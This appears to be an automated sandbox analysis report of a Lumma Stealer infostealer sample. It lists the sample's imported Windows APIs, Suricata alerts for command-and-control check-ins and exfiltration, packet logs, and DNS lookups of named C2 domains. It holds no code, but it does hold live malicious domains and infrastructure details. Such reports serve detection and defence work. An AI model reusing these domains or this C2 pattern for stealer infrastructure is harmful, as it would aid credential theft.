USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T11:41:48.239040+0100	2058039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)	1	192.168.2.7	55194	1.1.1.1	53	UDP
2025-01-10T11:41:48.251744+0100	2058514	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)	1	192.168.2.7	57753	1.1.1.1	53	UDP
2025-01-10T11:41:48.266539+0100	2058502	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)	1	192.168.2.7	64203	1.1.1.1	53	UDP
2025-01-10T11:41:48.277499+0100	2058492	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)	1	192.168.2.7	57952	1.1.1.1	53	UDP
2025-01-10T11:41:48.288094+0100	2058500	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)	1	192.168.2.7	58613	1.1.1.1	53	UDP
2025-01-10T11:41:48.299362+0100	2058510	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)	1	192.168.2.7	55668	1.1.1.1	53	UDP
2025-01-10T11:41:48.309803+0100	2058484	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)	1	192.168.2.7	63022	1.1.1.1	53	UDP
2025-01-10T11:41:48.321673+0100	2058512	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)	1	192.168.2.7	50921	1.1.1.1	53	UDP
2025-01-10T11:41:48.332730+0100	2058480	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)	1	192.168.2.7	50003	1.1.1.1	53	UDP
2025-01-10T11:41:49.020484+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49941	104.102.49.254	443	TCP
2025-01-10T11:41:50.387376+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.7	49941	104.102.49.254	443	TCP
2025-01-10T11:41:50.963232+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49947	104.21.48.1	443	TCP
2025-01-10T11:41:51.388752+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49947	104.21.48.1	443	TCP
2025-01-10T11:41:51.388752+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49947	104.21.48.1	443	TCP
2025-01-10T11:41:51.856695+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49956	104.21.48.1	443	TCP
2025-01-10T11:41:52.350877+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49956	104.21.48.1	443	TCP
2025-01-10T11:41:52.350877+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49956	104.21.48.1	443	TCP
2025-01-10T11:41:53.468747+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49964	104.21.48.1	443	TCP
2025-01-10T11:41:56.109188+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49976	104.21.48.1	443	TCP
2025-01-10T11:41:57.254577+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49977	104.21.48.1	443	TCP
2025-01-10T11:41:58.689401+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49978	104.21.48.1	443	TCP
2025-01-10T11:41:59.133170+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49978	104.21.48.1	443	TCP
2025-01-10T11:41:59.792757+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49980	104.21.48.1	443	TCP
2025-01-10T11:42:00.834584+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49981	104.21.48.1	443	TCP
2025-01-10T11:42:01.579448+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49981	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:41:48.358530998 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:48.358584881 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:48.359325886 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:48.361778975 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:48.361793041 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:49.020178080 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:49.020483971 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:49.022797108 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:49.022805929 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:49.023099899 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:49.072927952 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:49.088112116 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:49.131325960 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.387557983 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.387619019 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.387638092 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.387664080 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.387726068 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.387742996 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.387763977 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.387813091 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.392191887 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.392246008 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.392292023 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.392302036 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.392318964 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.392436028 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.392894030 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.392965078 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.392993927 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.393143892 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.393248081 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.394057035 CET	49941	443	192.168.2.7	104.102.49.254
Jan 10, 2025 11:41:50.394076109 CET	443	49941	104.102.49.254	192.168.2.7
Jan 10, 2025 11:41:50.411967993 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:50.412012100 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:50.412096024 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:50.412370920 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:50.412385941 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:50.962996006 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:50.963232040 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:50.965025902 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:50.965040922 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:50.965282917 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:50.966464996 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:50.966485977 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:50.966540098 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.388873100 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.389116049 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.389355898 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.389499903 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.389518023 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.389533997 CET	49947	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.389539957 CET	443	49947	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.394167900 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.394207001 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.394295931 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.394686937 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.394701004 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.856606960 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.856694937 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.857827902 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.857839108 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.858050108 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:51.859206915 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.859229088 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:51.859308958 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.350965977 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.351109982 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.351188898 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.351208925 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.351239920 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.351336956 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.351360083 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.351511002 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.351596117 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.351615906 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.351629972 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.351682901 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.351690054 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.355771065 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.355840921 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.355849981 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.401045084 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.401079893 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.437396049 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.437489986 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.437505007 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.437539101 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.437594891 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.437642097 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.437808037 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.437942982 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.438240051 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.438261032 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.438272953 CET	49956	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.438277960 CET	443	49956	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.958640099 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.958693027 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:52.958758116 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.959780931 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:52.959793091 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:53.468614101 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:53.468746901 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:53.470000029 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:53.470011950 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:53.470256090 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:53.471504927 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:53.471673012 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:53.471705914 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:55.557307005 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:55.557429075 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:55.557497025 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:55.597342014 CET	49964	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:55.597356081 CET	443	49964	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:55.617353916 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:55.617388010 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:55.617450953 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:55.617810965 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:55.617827892 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.109088898 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.109188080 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.123061895 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.123085022 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.123467922 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.143207073 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.143306971 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.143354893 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.143429995 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.187335968 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.674657106 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.674751997 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.674834013 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.697370052 CET	49976	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.697396994 CET	443	49976	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.784219027 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.784279108 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:56.784375906 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.785339117 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:56.785356998 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:57.254432917 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:57.254576921 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:57.256455898 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:57.256472111 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:57.256702900 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:57.258477926 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:57.258477926 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:57.258512020 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:57.258594036 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:57.258600950 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:57.877415895 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:57.877532959 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:57.877635956 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:57.877759933 CET	49977	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:57.877782106 CET	443	49977	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:58.211622000 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:58.211672068 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:58.211764097 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:58.212282896 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:58.212299109 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:58.689265966 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:58.689400911 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:58.690665007 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:58.690679073 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:58.690922976 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:58.692272902 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:58.692272902 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:58.692316055 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.133244991 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.133533955 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.133656979 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.133817911 CET	49978	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.133840084 CET	443	49978	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.191893101 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.191937923 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.192035913 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.192308903 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.192322016 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.792668104 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.792757034 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.794116974 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.794125080 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.794442892 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:41:59.795582056 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.795667887 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:41:59.795672894 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.375979900 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.376097918 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.376189947 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.376403093 CET	49980	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.376420021 CET	443	49980	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.379080057 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.379120111 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.379282951 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.379539967 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.379554987 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.834347963 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.834583998 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.835730076 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.835741043 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.836086035 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:00.837167978 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.837189913 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:00.837261915 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:01.579510927 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:01.579756021 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:01.579855919 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:01.579981089 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:01.580002069 CET	443	49981	104.21.48.1	192.168.2.7
Jan 10, 2025 11:42:01.580010891 CET	49981	443	192.168.2.7	104.21.48.1
Jan 10, 2025 11:42:01.580017090 CET	443	49981	104.21.48.1	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 11:41:11.013550997 CET	57751	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:11.022175074 CET	53	57751	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.239039898 CET	55194	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.248671055 CET	53	55194	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.251744032 CET	57753	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.264158964 CET	53	57753	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.266539097 CET	64203	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.275337934 CET	53	64203	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.277498960 CET	57952	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.285769939 CET	53	57952	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.288094044 CET	58613	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.297122002 CET	53	58613	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.299361944 CET	55668	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.307821035 CET	53	55668	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.309803009 CET	63022	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.318593979 CET	53	63022	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.321672916 CET	50921	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.330441952 CET	53	50921	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.332730055 CET	50003	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.343365908 CET	53	50003	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:48.345536947 CET	58548	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:48.352880955 CET	53	58548	1.1.1.1	192.168.2.7
Jan 10, 2025 11:41:50.397864103 CET	64852	53	192.168.2.7	1.1.1.1
Jan 10, 2025 11:41:50.407550097 CET	53	64852	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 11:41:11.013550997 CET	192.168.2.7	1.1.1.1	0x5bb8	Standard query (0)	HkdhdnSyRbxIxwUiM.HkdhdnSyRbxIxwUiM	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.239039898 CET	192.168.2.7	1.1.1.1	0xc7e2	Standard query (0)	brendon-sharjen.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.251744032 CET	192.168.2.7	1.1.1.1	0x2f28	Standard query (0)	wordyfindy.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.266539097 CET	192.168.2.7	1.1.1.1	0x6064	Standard query (0)	slipperyloo.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.277498960 CET	192.168.2.7	1.1.1.1	0xf475	Standard query (0)	manyrestro.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.288094044 CET	192.168.2.7	1.1.1.1	0x48a8	Standard query (0)	shapestickyr.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.299361944 CET	192.168.2.7	1.1.1.1	0xaf64	Standard query (0)	talkynicer.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.309803009 CET	192.168.2.7	1.1.1.1	0x3b4c	Standard query (0)	curverpluch.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.321672916 CET	192.168.2.7	1.1.1.1	0xc148	Standard query (0)	tentabatte.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.332730055 CET	192.168.2.7	1.1.1.1	0xe4b3	Standard query (0)	bashfulacid.lat	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.345536947 CET	192.168.2.7	1.1.1.1	0xa41d	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:50.397864103 CET	192.168.2.7	1.1.1.1	0x705a	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 11:41:11.022175074 CET	1.1.1.1	192.168.2.7	0x5bb8	Name error (3)	HkdhdnSyRbxIxwUiM.HkdhdnSyRbxIxwUiM	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.248671055 CET	1.1.1.1	192.168.2.7	0xc7e2	Name error (3)	brendon-sharjen.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.264158964 CET	1.1.1.1	192.168.2.7	0x2f28	Name error (3)	wordyfindy.lat	none	none	A (IP address)	IN (0x0001)	false
